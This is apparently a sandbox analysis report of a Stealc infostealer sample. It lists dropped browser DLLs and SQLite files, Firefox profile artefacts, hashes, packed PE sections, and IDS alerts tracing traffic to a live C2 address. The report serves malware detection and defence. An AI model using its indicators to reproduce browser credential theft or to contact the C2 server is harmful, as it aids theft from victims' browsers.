Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\FCAAEHJDBKJJKFHJEBKF

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HDAFHIDGIJKJKECBGDBGHDBKFH

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IDBAKKECAEGCAKFIIIDHCBAKKJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IJECBGIJDGCAEBFIIECA

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: Z66MsXpleT.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: eSLlhErJ0q.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.945102321158745
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'793'024 bytes
MD5:	9ee7d1fb0f1e8a7a998da096b4da22a9
SHA1:	11cf686cb71ea7fbde2c0448ddd1f12ab44a393e
SHA256:	7394adbf1fe4a07aa08d1e7d25c10b28994eb7eb8671b8ef767c349b5b44c37d
SHA512:	8ad5940613076e0ec4a55de21d21473ea73c2fe55c61b7c1b9ab444028290e1c987ac458dc59cd7356a692cf725eb285099be22cdf678d00f42a2bf23642ab1b
SSDEEP:	49152:QpmlJkbrv8l4VUJbL7Ly9QhXNe1A0KatPa+gB:QKJGQCVszqQHR0ja+U
TLSH:	6985331E9A149E78C31B15BD9E33C7476338E2A400DAD5C13CC5766C6A3D36626EACF8
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b...............u^......uk......u_......{v.....fz.......{f..............uZ......uh.....Rich............PE..L...M..f...........

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0xa88000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66C88B4D [Fri Aug 23 13:14:53 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FD0005255EAh

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x23f050	0x64	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x23f1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x23d000	0x13c00	87fdb6486025e788abff0a2eee2251f1	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x23e000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x23f000	0x1000	0x200	380655991303f284fcb90ef8e49522a1	False	0.1328125	data	0.9064079259880791	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x240000	0x2a8000	0x200	82a8582e0ff5517baca4cad0120be7d7	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
trzlrlhz	0x4e8000	0x19f000	0x19e600	96189baf9b0e392f06ad717ba442a939	False	0.9949077347285068	data	7.953821840467499	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
xbmoezwd	0x687000	0x1000	0x400	812cad17731eb6d4c4a37b48607cc35c	False	0.7421875	data	6.018712394805536	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x688000	0x3000	0x2200	583a113b96311a78a43271cce5eb6282	False	0.07628676470588236	DOS executable (COM)	1.0002716602602695	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-30T00:48:01.527095+0200	TCP	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	49704	80	192.168.2.5	185.215.113.100
2024-08-30T00:48:00.047505+0200	TCP	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	80	49704	185.215.113.100	192.168.2.5
2024-08-30T00:48:10.755871+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	49704	80	192.168.2.5	185.215.113.100
2024-08-30T00:48:00.291547+0200	TCP	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	49704	80	192.168.2.5	185.215.113.100
